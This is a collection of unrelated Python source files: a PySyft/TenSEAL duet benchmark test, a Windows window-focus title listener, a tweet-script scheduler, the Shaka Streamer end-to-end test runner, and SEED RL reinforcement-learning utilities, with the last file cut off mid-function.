# p = Process(target=run_training, args=(i, run_seed, options, process_queue))
# jobs.append(p)
# p.start()
# # Wait for signal that environment has successfully launched
# while process_queue.get() is not True:
# continue
if __name__ == '__main__':
main() |
duet_test.py | # stdlib
import atexit
from multiprocessing import Process
from multiprocessing import set_start_method
import socket
import sys
import time
from typing import Any
from typing import Generator
from typing import List
# third party
import pytest
# syft absolute
import syft as sy
# syft relative
from ...grid.duet.process_test import SyftTestProcess
from ...grid.duet.signaling_server_test import run
ts = pytest.importorskip("tenseal")
sy.load("tenseal")
set_start_method("spawn", force=True)
PORT = 21000
def chunks(lst: List[Any], n: int) -> Generator[Any, Any, Any]:
"""Yield successive n-sized chunks from lst.
Args:
lst: list of items to chunk
n: number of items to include in each chunk
Yields:
single chunk of n items
"""
for i in range(0, len(lst), n):
yield lst[i : i + n] # noqa: E203
def do(ct_size: int, batch_size: int) -> None:
# third party
import numpy as np
import tenseal as ts
# syft absolute
import syft as sy
sy.load("tenseal")
sy.logger.add(sys.stderr, "ERROR")
duet = sy.launch_duet(loopback=True, network_url=f"http://127.0.0.1:{PORT}/")
duet.requests.add_handler(action="accept")
context = ts.context(
ts.SCHEME_TYPE.CKKS, 8192, coeff_mod_bit_sizes=[60, 40, 40, 60], n_threads=1
)
context.global_scale = pow(2, 40)
data = np.random.uniform(-10, 10, 100)
enc = []
for i in range(ct_size):
enc.append(ts.ckks_vector(context, data))
start = time.time()
_ = context.send(duet, pointable=True)
for chunk in chunks(enc, batch_size):
_ = sy.lib.python.List(chunk).send(duet, pointable=True)
sys.stderr.write(
f"[{ct_size}][{batch_size}] DO sending took {time.time() - start} sec\n"
)
sy.core.common.event_loop.loop.run_forever()
def ds(ct_size: int, batch_size: int) -> None:
# syft absolute
import syft as sy
sy.load("tenseal")
sy.logger.add(sys.stderr, "ERROR")
duet = sy.join_duet(loopback=True, network_url=f"http://127.0.0.1:{PORT}/")
time.sleep(10)
cnt = int(ct_size / batch_size)
start = time.time()
ctx = duet.store[0].get(request_block=True, delete_obj=False)
for idx in range(1, cnt + 1):
data = duet.store[idx].get(request_block=True, delete_obj=False)
for tensor in data:
tensor.link_context(ctx)
assert len(data) == batch_size, len(data)
sys.stderr.write(
f"[{ct_size}][{batch_size}] DS get took {time.time() - start} sec\n"
)
@pytest.fixture(scope="module")
def signaling_server() -> Process:
print(f"creating signaling server on port {PORT}")
grid_proc = Process(target=run, args=(PORT,))
grid_proc.start()
def grid_cleanup() -> None:
print("stop signaling server")
grid_proc.terminate()
grid_proc.join()
atexit.register(grid_cleanup)
return grid_proc
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_duet_ciphertext_size(signaling_server: Process) -> None:
time.sleep(3)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
assert s.connect_ex(("localhost", PORT)) == 0
for ct_size in [10, 20]:
for batch_size in [1, 10, ct_size]:
start = time.time()
do_proc = SyftTestProcess(target=do, args=(ct_size, batch_size))
do_proc.start()
ds_proc = SyftTestProcess(target=ds, args=(ct_size, batch_size))
ds_proc.start()
ds_proc.join(120)
do_proc.terminate()
if do_proc.exception:
exception, tb = do_proc.exception
raise Exception(tb) from exception
if ds_proc.exception:
exception, tb = ds_proc.exception
raise Exception(tb) from exception
if ds_proc.is_alive():
ds_proc.terminate()
raise Exception(f"ds_proc is hanged for {ct_size}")
print(
f"test {ct_size} batch_size {batch_size} passed in {time.time() - start} seconds"
)
|
window change listener.py | """
Script using the Windows API to register for window focus changes and print the
titles of newly focused windows.
"""
import sys
import time
import ctypes
import ctypes.wintypes
import threading
import six
class ObservableWindowChange(object):
def __init__(self):
self.__observers = []
def register_observer(self, observer):
self.__observers.append(observer)
def notify_observers(self, *args, **kwargs):
win_title = ''.join(args)
if win_title == '':
return ''
for observer in self.__observers:
observer.notify(win_title)
def start_event_listener(self):
# Create a WindowChangeEventListener object with this instance of
# ObservableWindowChange as a parameter (self)
listener = WindowChangeEventListener(self)
listener.listen_forever()
class IWindowChangeObserver(object):
"""
Base class for observing window changes
"""
def __init__(self, observable):
observable.register_observer(self)
def notify(self, win_title):
raise NotImplementedError
class WindowChangeEventListener(object):
"""
WindowChangeEventListener
"""
def __init__(self, observable):
self.observable = observable
def listen_forever(self):
# This is to fix a problem with ascii encoding (windows with Unicode in
# their titles)
if six.PY2:
reload(sys)
sys.setdefaultencoding('utf8')
# Look here for DWORD event constants:
# http://stackoverflow.com/questions/15927262/convert-dword-event-constant-from-wineventproc-to-name-in-c-sharp
# Don't worry, they work for python too.
EVENT_SYSTEM_DIALOGSTART = 0x0010
WINEVENT_OUTOFCONTEXT = 0x0000
EVENT_SYSTEM_FOREGROUND = 0x0003
WINEVENT_SKIPOWNPROCESS = 0x0002
user32 = ctypes.windll.user32
ole32 = ctypes.windll.ole32
EnumWindows = ctypes.windll.user32.EnumWindows
EnumWindowsProc = ctypes.WINFUNCTYPE(ctypes.c_bool,
ctypes.POINTER(ctypes.c_int),
ctypes.POINTER(ctypes.c_int))
GetWindowText = ctypes.windll.user32.GetWindowTextW
GetWindowTextLength = ctypes.windll.user32.GetWindowTextLengthW
IsWindowVisible = ctypes.windll.user32.IsWindowVisible
ole32.CoInitialize(0)
WinEventProcType = ctypes.WINFUNCTYPE(
None,
ctypes.wintypes.HANDLE,
ctypes.wintypes.DWORD,
ctypes.wintypes.HWND,
ctypes.wintypes.LONG,
ctypes.wintypes.LONG,
ctypes.wintypes.DWORD,
ctypes.wintypes.DWORD
)
def callback(hWinEventHook, event, hwnd, idObject, idChild, dwEventThread,
dwmsEventTime):
length = GetWindowTextLength(hwnd)
buff = ctypes.create_unicode_buffer(length + 1)
GetWindowText(hwnd, buff, length + 1)
# Notify observers
self.observable.notify_observers(buff.value)
WinEventProc = WinEventProcType(callback)
user32.SetWinEventHook.restype = ctypes.wintypes.HANDLE
hook = user32.SetWinEventHook(
EVENT_SYSTEM_FOREGROUND,
EVENT_SYSTEM_FOREGROUND,
0,
WinEventProc,
0,
0,
WINEVENT_OUTOFCONTEXT | WINEVENT_SKIPOWNPROCESS
)
if hook == 0:
print('SetWinEventHook failed')
exit(1)
msg = ctypes.wintypes.MSG()
while user32.GetMessageW(ctypes.byref(msg), 0, 0, 0) != 0:
user32.TranslateMessageW(msg)
user32.DispatchMessageW(msg)
# Stopped receiving events, so clear up the winevent hook and uninitialise.
print('Stopped receiving new window change events. Exiting...')
user32.UnhookWinEvent(hook)
ole32.CoUninitialize()
class WindowObserver(IWindowChangeObserver):
def notify(self, win_title):
print("Window '%s' focused" % win_title)
if __name__ == '__main__':
def run():
# Create an observable and an observer observing it
subject = ObservableWindowChange()
observer = WindowObserver(subject)
# Listen for window changes
subject.start_event_listener()
# Start the 'run' method in a daemonized thread.
t = threading.Thread(target=run)
t.setDaemon(True)
t.start()
# Keep the main thread running in a sleep loop until ctrl+c (SIGINT) is caught.
# Once the main thread terminates, all daemon threads will automatically
# terminate.
while True:
try:
time.sleep(0.1)
except KeyboardInterrupt:
break
|
tweet.py | import time
import threading
import subprocess
# ๅฎ่ก้้ใ่จญๅฎ
def wait():
time.sleep(600)
# ๅฎ่กใใใใกใคใซใ่จญๅฎ
def cmd_exe(): # Call Python files
subprocess.call("python osaka_tweet.py")
print("ๅคง้ชใใคใผใ")
print("------------------------------------------------------")
subprocess.call("python hyogo_tweet.py")
print("ๅ
ตๅบซใใคใผใ")
print("------------------------------------------------------")
subprocess.call("python tokyo_tweet.py")
print("ๆฑไบฌใใคใผใ")
print("------------------------------------------------------")
subprocess.call("python hokkaido_tweet.py")
print("ๅๆตท้ใใคใผใ")
print("------------------------------------------------------")
subprocess.call("python fukuoka_tweet.py")
print("็ฆๅฒกใใคใผใ")
print("------------------------------------------------------")
subprocess.call("python aichi_tweet.py")
print("ๆ็ฅใใคใผใ")
print("------------------------------------------------------")
subprocess.call("python japan_tweet.py")
print("ๅฝๅ
ใใคใผใ")
print("------------------------------------------------------")
method_list = [wait, cmd_exe]
threads = []
current_time = time.time()
for i in range(1, 4320):
for method in method_list:
t = threading.Thread(target=method)
t.start()
threads.append(t)
for t in threads:
t.join() |
run_end_to_end_tests.py | #!/usr/bin/env python3
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import flask
import glob
import json
import logging
import os
import re
import shutil
import subprocess
import sys
import time
import threading
import traceback
import urllib
from mypy import api as mypy_api
from streamer import node_base
from streamer.controller_node import ControllerNode
from streamer.configuration import ConfigError
OUTPUT_DIR = 'output_files/'
TEST_DIR = 'test_assets/'
CLOUD_TEST_ASSETS = (
'https://storage.googleapis.com/shaka-streamer-assets/test-assets/')
# Turn down Flask's logging so that the console isn't flooded with messages
# about every request. Because flask is built on top of another tool called
# "werkzeug", this the name we use to retrieve the log instance.
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
# Changes relative path to where this file is.
os.chdir(os.path.dirname(os.path.abspath(__file__)))
controller = None
app = flask.Flask(__name__)
# Stops browser from caching files to prevent cross-test contamination.
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
def cleanup():
# If the controller is running, stop it.
global controller
if controller is not None:
controller.stop()
controller = None
# If the output directory exists, delete it and make a new one.
if os.path.exists(OUTPUT_DIR):
shutil.rmtree(OUTPUT_DIR)
os.mkdir(OUTPUT_DIR)
def createCrossOriginResponse(body=None, status=200, mimetype='text/plain'):
# Enable CORS because karma and flask are cross-origin.
resp = flask.Response(response=body, status=status)
resp.headers.add('Content-Type', mimetype)
resp.headers.add('Access-Control-Allow-Origin', '*')
resp.headers.add('Access-Control-Allow-Methods', 'GET,POST')
return resp
def dashStreamsReady(manifest_path):
"""Wait for DASH streams to be ready.
Return True if the DASH manifest exists and each Representation has at least
one segment in it.
"""
# Check to see if the DASH manifest exists yet.
if not os.path.exists(manifest_path):
return False
# Waiting until every Representation has a segment.
pattern = re.compile(r'<Representation.*?((\n).*?)*?Representation>')
with open(manifest_path) as manifest_file:
for representation in pattern.finditer(manifest_file.read()):
if not re.search(r'<S t', representation.group()):
# This Representation has no segments.
return False
return True
def hlsStreamsReady(master_playlist_path):
"""Wait for HLS streams to be ready.
Return True if the HLS master playlist exists, and all of the media playlists
referenced by it exist, and each of those media playlists have at least one
segment in it.
"""
# Check to see if the HLS master playlist exists yet.
if not os.path.exists(master_playlist_path):
return False
# Parsing master playlist to see how many media playlists there are.
# Do this every time, since the master playlist contents may change.
with open(master_playlist_path) as hls_file:
contents = hls_file.read()
media_playlist_list = re.findall(r'^.*\.m3u8$', contents, re.MULTILINE)
media_playlist_count = len(media_playlist_list)
# See how many playlists exist so far.
playlist_list = glob.glob(OUTPUT_DIR + '*.m3u8')
# Return False if we don't have the right number. The +1 accounts for the
# master playlist.
if len(playlist_list) != media_playlist_count + 1:
return False
for playlist_path in playlist_list:
if playlist_path == master_playlist_path:
# Skip the master playlist
continue
with open(playlist_path) as playlist_file:
if '#EXTINF' not in playlist_file.read():
# This doesn't have segments yet.
return False
return True
@app.route('/start', methods = ['POST'])
def start():
global controller
if controller is not None:
return createCrossOriginResponse(
status=403, body='Instance already running!')
cleanup()
# Receives configs from the tests to start Shaka Streamer.
try:
configs = json.loads(flask.request.data)
except Exception as e:
return createCrossOriginResponse(status=400, body=str(e))
# Enforce quiet mode without needing it specified in every test.
configs['pipeline_config']['quiet'] = True
controller = ControllerNode()
try:
controller.start(OUTPUT_DIR,
configs['input_config'],
configs['pipeline_config'],
configs['bitrate_config'],
check_deps=False)
except Exception as e:
# If the controller throws an exception during startup, we want to call
# stop() to shut down any external processes that have already been started.
controller.stop()
controller = None
# Then, fail the request with a message that indicates what the error was.
if isinstance(e, ConfigError):
body = json.dumps({
'error_type': type(e).__name__,
'class_name': e.class_name,
'field_name': e.field_name,
'field_type': e.field.get_type_name(),
'message': str(e),
})
return createCrossOriginResponse(
status=418, mimetype='application/json', body=body)
else:
traceback.print_exc()
return createCrossOriginResponse(status=500, body=str(e))
return createCrossOriginResponse()
@app.route('/stop')
def stop():
global controller
resp = createCrossOriginResponse()
if controller is not None:
# Check status to see if one of the processes exited.
if controller.check_status() == node_base.ProcessStatus.Errored:
resp = createCrossOriginResponse(
status=500, body='Some processes exited with non-zero exit codes')
cleanup()
return resp
@app.route('/output_files/<path:filename>', methods = ['GET', 'OPTIONS'])
def send_file(filename):
if not controller:
return createCrossOriginResponse(
status=403, body='Instance already shut down!')
elif controller.is_vod():
# If streaming mode is vod, needs to wait until packager is completely
# done packaging contents.
while True:
status = controller.check_status()
if status == node_base.ProcessStatus.Finished:
break
elif status != node_base.ProcessStatus.Running:
return createCrossOriginResponse(
status=500, body='Some processes exited with non-zero exit codes')
time.sleep(1)
else:
# If streaming mode is live, needs to wait for specific content in
# manifest until it can be loaded by the player.
if filename.endswith('.mpd'):
while not dashStreamsReady(OUTPUT_DIR + filename):
time.sleep(1)
elif filename.endswith('.m3u8') and not filename.startswith('stream_'):
while not hlsStreamsReady(OUTPUT_DIR + filename):
time.sleep(1)
# Sending over requested files.
try:
response = flask.send_file(OUTPUT_DIR + filename);
except FileNotFoundError:
response = flask.Response(response='File not found', status=404)
response.headers.add('Access-Control-Allow-Origin', '*')
response.headers.add('Access-Control-Allow-Headers', 'RANGE')
return response
def fetch_cloud_assets():
file_list = [
'BigBuckBunny.1080p.mp4',
'Sintel.2010.720p.Small.mkv',
'Sintel.2010.Arabic.vtt',
'Sintel.2010.Chinese.vtt',
'Sintel.2010.English.vtt',
'Sintel.2010.Esperanto.vtt',
'Sintel.2010.French.vtt',
'Sintel.2010.Spanish.vtt',
'Sintel.with.subs.mkv',
]
# Downloading all the assests for tests.
for file in file_list:
if not os.path.exists(TEST_DIR + file):
response = urllib.request.urlretrieve(CLOUD_TEST_ASSETS +
file,
TEST_DIR + file)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--runs', default=1, type=int,
help='Number of trials to run')
parser.add_argument('--reporters', nargs='+',
help='Enables specified reporters in karma')
args = parser.parse_args()
# Do static type checking on the project first.
type_check_result = mypy_api.run(['streamer/'])
if type_check_result[2] != 0:
print('The type checker found the following errors: ')
print(type_check_result[0])
return 1
# Install test dependencies.
subprocess.check_call(['npm', 'install'])
# Fetch streams used in tests.
if not os.path.exists(TEST_DIR):
os.mkdir(TEST_DIR)
fetch_cloud_assets()
# Start up flask server on a thread.
# Daemon is set to True so that this thread automatically gets
# killed when exiting main. Flask does not have any clean alternatives
# to be killed.
threading.Thread(target=app.run, daemon=True).start()
fails = 0
trials = args.runs
print('Running', trials, 'trials')
for i in range(trials):
# Start up karma.
karma_args = [
'node_modules/karma/bin/karma',
'start',
'tests/karma.conf.js',
# DRM currently is not compatible with headless, so it's run in Chrome.
# Linux: If you want to run tests as "headless", wrap it with "xvfb-run -a".
'--browsers', 'Chrome',
'--single-run',
]
if args.reporters:
converted_string = ','.join(args.reporters)
karma_args += [
'--reporters',
converted_string,
]
# If the exit code was not 0, the tests in karma failed or crashed.
if subprocess.call(karma_args) != 0:
fails += 1
print('\n\nNumber of failures:', fails, '\nNumber of trials:', trials)
print('\nSuccess rate:', 100 * (trials - fails) / trials, '%')
cleanup()
return fails
if __name__ == '__main__':
# Exit code based on test results from subprocess call.
sys.exit(main())
|
utils.py | # coding=utf-8
# Copyright 2019 The SEED Authors
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions/classes."""
import collections
import contextlib
import threading
import timeit
from absl import logging
import numpy as np
import tensorflow as tf
from tensorflow.python.distribute import values as values_lib
from tensorflow.python.framework import composite_tensor
from tensorflow.python.framework import tensor_conversion_registry
# `observation` is the observation *after* a transition. When `done` is True,
# `observation` will be the observation *after* the reset.
EnvOutput = collections.namedtuple('EnvOutput', 'reward done observation')
Settings = collections.namedtuple(
'Settings', 'strategy inference_devices training_strategy encode decode')
def init_learner(num_training_tpus):
"""Performs common learner initialization."""
if tf.config.experimental.list_logical_devices('TPU'):
resolver = tf.distribute.cluster_resolver.TPUClusterResolver('')
topology = tf.tpu.experimental.initialize_tpu_system(resolver)
strategy = tf.distribute.experimental.TPUStrategy(resolver)
training_da = tf.tpu.experimental.DeviceAssignment.build(
topology, num_replicas=num_training_tpus)
training_strategy = tf.distribute.experimental.TPUStrategy(
resolver, device_assignment=training_da)
inference_devices = list(set(strategy.extended.worker_devices) -
set(training_strategy.extended.worker_devices))
return Settings(strategy, inference_devices, training_strategy, tpu_encode,
tpu_decode)
else:
tf.device('/cpu').__enter__()
any_gpu = tf.config.experimental.list_logical_devices('GPU')
device_name = '/device:GPU:0' if any_gpu else '/device:CPU:0'
strategy = tf.distribute.OneDeviceStrategy(device=device_name)
enc = lambda x: x
dec = lambda x, s=None: x if s is None else tf.nest.pack_sequence_as(s, x)
return Settings(strategy, [device_name], strategy, enc, dec)
class UnrollStore(tf.Module):
"""Utility module for combining individual actor steps into unrolls."""
def __init__(self,
num_actors,
unroll_length,
timestep_specs,
num_overlapping_steps=0,
name='UnrollStore'):
super(UnrollStore, self).__init__(name=name)
with self.name_scope:
self._full_length = num_overlapping_steps + unroll_length + 1
def create_unroll_variable(spec):
z = tf.zeros(
[num_actors, self._full_length] + spec.shape.dims, dtype=spec.dtype)
return tf.Variable(z, trainable=False, name=spec.name)
self._unroll_length = unroll_length
self._num_overlapping_steps = num_overlapping_steps
self._state = tf.nest.map_structure(create_unroll_variable,
timestep_specs)
# For each actor, the index into the actor dimension of the tensors in
# self._state where we should add the next element.
self._index = tf.Variable(
tf.fill([num_actors], tf.constant(num_overlapping_steps, tf.int32)),
trainable=False,
name='index')
@property
def unroll_specs(self):
return tf.nest.map_structure(lambda v: tf.TensorSpec(v.shape[1:], v.dtype),
self._state)
@tf.function
@tf.Module.with_name_scope
def append(self, actor_ids, values):
"""Appends values and returns completed unrolls.
Args:
actor_ids: 1D tensor with the list of actor IDs for which we append data.
There must not be duplicates.
values: Values to add for each actor. This is a structure (in the tf.nest
sense) of tensors following "timestep_specs", with a batch front
dimension which must be equal to the length of 'actor_ids'.
Returns:
A pair of:
- 1D tensor of the actor IDs of the completed unrolls.
- Completed unrolls. This is a structure of tensors following
'timestep_specs', with added front dimensions: [num_completed_unrolls,
num_overlapping_steps + unroll_length + 1].
"""
tf.debugging.assert_equal(
tf.shape(actor_ids),
tf.shape(tf.unique(actor_ids)[0]),
message='Duplicate actor ids')
tf.nest.map_structure(
lambda s: tf.debugging.assert_equal(
tf.shape(actor_ids)[0],
tf.shape(s)[0],
message='Batch dimension must be same size as number of actors.'),
values)
curr_indices = self._index.sparse_read(actor_ids)
unroll_indices = tf.stack([actor_ids, curr_indices], axis=-1)
for s, v in zip(tf.nest.flatten(self._state), tf.nest.flatten(values)):
s.scatter_nd_update(unroll_indices, v)
# Intentionally not protecting against out-of-bounds to make it possible to
# detect completed unrolls.
self._index.scatter_add(tf.IndexedSlices(1, actor_ids))
return self._complete_unrolls(actor_ids)
@tf.function
@tf.Module.with_name_scope
def reset(self, actor_ids):
"""Resets state.
Note, this is only intended to be called when actors need to be reset after
preemptions. Not at episode boundaries.
Args:
actor_ids: The actors that need to have their state reset.
"""
self._index.scatter_update(
tf.IndexedSlices(self._num_overlapping_steps, actor_ids))
# The following code is the equivalent of:
# s[actor_ids, :j] = 0
j = self._num_overlapping_steps
repeated_actor_ids = tf.reshape(
tf.tile(tf.expand_dims(tf.cast(actor_ids, tf.int64), -1), [1, j]), [-1])
repeated_range = tf.tile(tf.range(j, dtype=tf.int64),
[tf.shape(actor_ids)[0]])
indices = tf.stack([repeated_actor_ids, repeated_range], axis=-1)
for s in tf.nest.flatten(self._state):
z = tf.zeros(tf.concat([tf.shape(repeated_actor_ids),
s.shape[2:]], axis=0), s.dtype)
s.scatter_nd_update(indices, z)
def _complete_unrolls(self, actor_ids):
# Actor with unrolls that are now complete and should be returned.
actor_indices = self._index.sparse_read(actor_ids)
actor_ids = tf.gather(
actor_ids,
tf.where(tf.equal(actor_indices, self._full_length))[:, 0])
actor_ids = tf.cast(actor_ids, tf.int64)
unrolls = tf.nest.map_structure(lambda s: s.sparse_read(actor_ids),
self._state)
# Store last transitions as the first in the next unroll.
# The following code is the equivalent of:
# s[actor_ids, :j] = s[actor_ids, -j:]
j = self._num_overlapping_steps + 1
repeated_start_range = tf.tile(tf.range(j, dtype=tf.int64),
[tf.shape(actor_ids)[0]])
repeated_end_range = tf.tile(
tf.range(self._full_length - j, self._full_length, dtype=tf.int64),
[tf.shape(actor_ids)[0]])
repeated_actor_ids = tf.reshape(
tf.tile(tf.expand_dims(actor_ids, -1), [1, j]), [-1])
start_indices = tf.stack([repeated_actor_ids, repeated_start_range], -1)
end_indices = tf.stack([repeated_actor_ids, repeated_end_range], -1)
for s in tf.nest.flatten(self._state):
s.scatter_nd_update(start_indices, s.gather_nd(end_indices))
self._index.scatter_update(
tf.IndexedSlices(1 + self._num_overlapping_steps, actor_ids))
return actor_ids, unrolls
class PrioritizedReplay(tf.Module):
"""Prioritized Replay Buffer.
This buffer is not threadsafe. Make sure you call insert() and sample() from a
single thread.
"""
def __init__(self, size, specs, importance_sampling_exponent,
name='PrioritizedReplay'):
super(PrioritizedReplay, self).__init__(name=name)
self._priorities = tf.Variable(tf.zeros([size]), dtype=tf.float32)
self._buffer = tf.nest.map_structure(
lambda ts: tf.Variable(tf.zeros([size] + ts.shape, dtype=ts.dtype)),
specs)
self.num_inserted = tf.Variable(0, dtype=tf.int64)
self._importance_sampling_exponent = importance_sampling_exponent
@tf.function
@tf.Module.with_name_scope
def insert(self, values, priorities):
"""FIFO insertion/removal.
Args:
values: The batched values to insert. The tensors must be of the same
shape and dtype as the `specs` provided in the constructor, except
including a batch dimension.
priorities: <float32>[batch_size] tensor with the priorities of the
elements we insert.
Returns:
The indices of the inserted values.
"""
tf.nest.assert_same_structure(values, self._buffer)
values = tf.nest.map_structure(tf.convert_to_tensor, values)
append_size = tf.nest.flatten(values)[0].shape[0]
start_index = self.num_inserted
end_index = start_index + append_size
# Wrap around insertion.
size = self._priorities.shape[0]
insert_indices = tf.range(start_index, end_index) % size
tf.nest.map_structure(
lambda b, v: b.batch_scatter_update(
tf.IndexedSlices(v, insert_indices)),
self._buffer,
values)
self.num_inserted.assign_add(append_size)
self._priorities.batch_scatter_update(
tf.IndexedSlices(priorities, insert_indices))
return insert_indices
@tf.function
@tf.Module.with_name_scope
def sample(self, num_samples, priority_exp):
r"""Samples items from the replay buffer, using priorities.
Args:
num_samples: int, number of replay items to sample.
priority_exp: Priority exponent. Every item i in the replay buffer will be
sampled with probability:
priority[i] ** priority_exp /
sum(priority[j] ** priority_exp, j \in [0, num_items))
Set this to 0 in order to get uniform sampling.
Returns:
Tuple of:
- indices: An int64 tensor of shape [num_samples] with the indices in
the replay buffer of the sampled items.
- weights: A float32 tensor of shape [num_samples] with the normalized
weights of the sampled items.
- sampled_values: A nested structure following the spec passed in the
contructor, where each tensor has an added front batch dimension equal
to 'num_samples'.
"""
tf.debugging.assert_greater_equal(
self.num_inserted,
tf.constant(0, tf.int64),
message='Cannot sample if replay buffer is empty')
size = self._priorities.shape[0]
limit = tf.minimum(tf.cast(size, tf.int64), self.num_inserted)
if priority_exp == 0:
indices = tf.random.uniform([num_samples], maxval=limit, dtype=tf.int64)
weights = tf.ones_like(indices, dtype=tf.float32)
else:
prob = self._priorities[:limit]**priority_exp
prob /= tf.reduce_sum(prob)
indices = tf.random.categorical([tf.math.log(prob)], num_samples)[0]
# Importance weights.
weights = (((1. / tf.cast(limit, tf.float32)) /
tf.gather(prob, indices)) **
self._importance_sampling_exponent)
weights /= tf.reduce_max(weights) # Normalize.
sampled_values = tf.nest.map_structure(
lambda b: b.sparse_read(indices), self._buffer)
return indices, weights, sampled_values
@tf.function
@tf.Module.with_name_scope
def update_priorities(self, indices, priorities):
"""Updates the priorities of the items with the given indices.
Args:
indices: <int64>[batch_size] tensor with the indices of the items to
update. If duplicate indices are provided, the priority that will be set
among possible ones is not specified.
priorities: <float32>[batch_size] tensor with the new priorities.
"""
self._priorities.batch_scatter_update(tf.IndexedSlices(priorities, indices))
class Aggregator(tf.Module):
"""Utility module for keeping state and statistics for individual actors."""
def __init__(self, num_actors, specs, name='Aggregator'):
"""Inits an Aggregator.
Args:
num_actors: int, number of actors.
specs: Structure (as defined by tf.nest) of tf.TensorSpecs that will be
stored for each actor.
name: Name of the scope for the operations.
"""
super(Aggregator, self).__init__(name=name)
def create_variable(spec):
z = tf.zeros([num_actors] + spec.shape.dims, dtype=spec.dtype)
return tf.Variable(z, trainable=False, name=spec.name)
self._state = tf.nest.map_structure(create_variable, specs)
@tf.Module.with_name_scope
def reset(self, actor_ids):
"""Fills the tensors for the given actors with zeros."""
with tf.name_scope('Aggregator_reset'):
for s in tf.nest.flatten(self._state):
s.scatter_update(tf.IndexedSlices(0, actor_ids))
@tf.Module.with_name_scope
def add(self, actor_ids, values):
"""In-place adds values to the state associated to the given actors.
Args:
actor_ids: 1D tensor with the list of actor IDs we want to add values to.
values: A structure of tensors following the input spec, with an added
first dimension that must either have the same size as 'actor_ids', or
should not exist (in which case, the value is broadcasted to all actor
ids).
"""
tf.nest.assert_same_structure(values, self._state)
for s, v in zip(tf.nest.flatten(self._state), tf.nest.flatten(values)):
s.scatter_add(tf.IndexedSlices(v, actor_ids))
@tf.Module.with_name_scope
def read(self, actor_ids):
"""Reads the values corresponding to a list of actors.
Args:
actor_ids: 1D tensor with the list of actor IDs we want to read.
Returns:
A structure of tensors with the same shapes as the input specs. A
dimension is added in front of each tensor, with size equal to the number
of actor_ids provided.
"""
return tf.nest.map_structure(lambda s: s.sparse_read(actor_ids),
self._state)
@tf.Module.with_name_scope
def replace(self, actor_ids, values):
"""Replaces the state associated to the given actors.
Args:
actor_ids: 1D tensor with the list of actor IDs.
values: A structure of tensors following the input spec, with an added
first dimension that must either have the same size as 'actor_ids', or
should not exist (in which case, the value is broadcasted to all actor
ids).
"""
tf.nest.assert_same_structure(values, self._state)
for s, v in zip(tf.nest.flatten(self._state), tf.nest.flatten(values)):
s.scatter_update(tf.IndexedSlices(v, actor_ids))
class ProgressLogger(object):
"""Helper class for performing periodic logging of the training progress."""
def __init__(self,
summary_writer=None,
initial_period=0.01,
period_factor=1.01,
max_period=10.0):
"""Constructs ProgressLogger.
Args:
summary_writer: Tensorflow summary writer to use.
initial_period: Initial logging period in seconds
(how often logging happens).
period_factor: Factor by which logging period is
multiplied after each iteration (exponential back-off).
max_period: Maximal logging period in seconds
(the end of exponential back-off).
"""
self.summary_writer = summary_writer
self.period = initial_period
self.period_factor = period_factor
self.max_period = max_period
# Array of strings with names of values to be logged.
self.log_keys = []
self.step_cnt = tf.Variable(-1, dtype=tf.int64)
self.ready_values = tf.Variable([-1.0],
dtype=tf.float32,
shape=tf.TensorShape(None))
self.logger_thread = None
self.logging_callback = None
self.terminator = None
self.last_log_time = timeit.default_timer()
self.last_log_step = 0
def start(self, logging_callback=None):
assert self.logger_thread is None
self.logging_callback = logging_callback
self.terminator = threading.Event()
self.logger_thread = threading.Thread(target=self._logging_loop)
self.logger_thread.start()
def shutdown(self):
assert self.logger_thread
self.terminator.set()
self.logger_thread.join()
self.logger_thread = None
def log_session(self):
return []
def log(self, session, name, value):
# this is a python op so it happens only when this tf.function is compiled
self.log_keys.append(name)
# this is a TF op.
session.append(value)
def step_end(self, session, strategy=None, step_increment=1):
logs = []
for value in session:
if strategy:
value = tf.reduce_mean(tf.cast(
strategy.experimental_local_results(value)[0], tf.float32))
logs.append(value)
self.ready_values.assign(logs)
self.step_cnt.assign_add(step_increment)
def _log(self):
"""Perform single round of logging."""
logging_time = timeit.default_timer()
step_cnt = self.step_cnt.read_value()
values = self.ready_values.read_value().numpy()
if values[0] == -1:
return
assert len(values) == len(
self.log_keys
), 'Mismatch between number of keys and values to log: %r vs %r' % (
values, self.log_keys)
if self.summary_writer:
self.summary_writer.set_as_default()
tf.summary.experimental.set_step(step_cnt.numpy())
if self.logging_callback:
self.logging_callback()
for key, value in zip(self.log_keys, values):
tf.summary.scalar(key, value)
dt = logging_time - self.last_log_time
df = tf.cast(step_cnt - self.last_log_step, tf.float32)
tf.summary.scalar('speed/steps_per_sec', df / dt)
self.last_log_time, self.last_log_step = logging_time, step_cnt
def _logging_loop(self):
while not self.terminator.isSet():
last_log_time = self.last_log_time
self._log()
elapsed = timeit.default_timer() - last_log_time
self.period = min(self.period_factor * self.period,
self.max_period)
self.terminator.wait(timeout=max(0, self.period - elapsed))
class StructuredFIFOQueue(tf.queue.FIFOQueue):
"""A tf.queue.FIFOQueue that supports nests and tf.TensorSpec."""
def __init__(self,
capacity,
specs,
shared_name=None,
name='structured_fifo_queue'):
self._specs = specs
self._flattened_specs = tf.nest.flatten(specs)
dtypes = [ts.dtype for ts in self._flattened_specs]
shapes = [ts.shape for ts in self._flattened_specs]
super(StructuredFIFOQueue, self).__init__(capacity, dtypes, shapes)
def dequeue(self, name=None):
result = super(StructuredFIFOQueue, self).dequeue(name=name)
return tf.nest.pack_sequence_as(self._specs, result)
def dequeue_many(self, batch_size, name=None):
result = super(StructuredFIFOQueue, self).dequeue_many(
batch_size, name=name)
